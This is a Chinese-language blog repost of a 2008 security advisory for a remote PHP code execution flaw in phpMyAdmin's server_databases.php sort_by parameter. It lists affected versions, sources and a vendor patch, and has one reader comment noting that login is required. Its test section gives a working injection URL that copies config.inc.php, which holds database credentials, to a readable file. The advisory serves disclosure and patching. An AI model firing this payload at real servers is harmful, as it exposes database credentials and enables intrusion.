phpMyAdmin sort_by参数远程代码执行漏洞

    [雨 September 19, 2008 10:58 | by !4p47hy ]
发布日期:2008-09-15
更新日期:2008-09-17

受影响系统:

phpMyAdmin phpMyAdmin < 2.11.9.1


不受影响系统:

phpMyAdmin phpMyAdmin 2.11.9.1

描述:BUGTRAQ ID: 31188

phpMyAdmin是用PHP编写的工具,用于通过WEB管理MySQL。

phpMyAdmin的server_databases.php脚本没有正确地过滤对sort_by参数的输入,远程攻击者可以通过提交恶意请求注入并执行任意PHP代码。

<*来源:Norman Hippert

链接:http://secunia.com/advisories/31884
http://www.phpmyadmin.net/home_page/security.php?issue=PMASA-2008-7
http://fd.the-wildcat.de/pma_e36a091q11.php
*>

测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
http://www.example.com/server_databases.php?pos=0&dbstats=0&sort_by="]) OR exec('cp $(pwd)"/config.inc.php" config.txt'); //&sort_order=desc&token=[valid token]


建议:厂商补丁:

phpMyAdmin
----------
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:

http://cache.gmane.org//gmane/comp/security/oss/general/947-001.bin

from:http://www.nsfocus.net/vulndb/12387
Bug&Exp | Comments(1) | Trackbacks(0) | Reads(11400)
xds2000 Email
September 19, 2008 14:43
看了一下说明,此漏洞有重现是需要条件的:
1、用户必须先登陆进去,才可以攻击。
Pages: 1/1 First page 1 Final page
Add a comment
Emots
emotemotemotemotemot
emotemotemotemotemot
emotemotemotemotemot
emotemotemotemotemot
emotemotemotemotemot
Enable HTML
Enable UBB
Enable Emots
Hidden
Nickname   Password   Optional
Site URI   Email   [Register]
               

Security code Case insensitive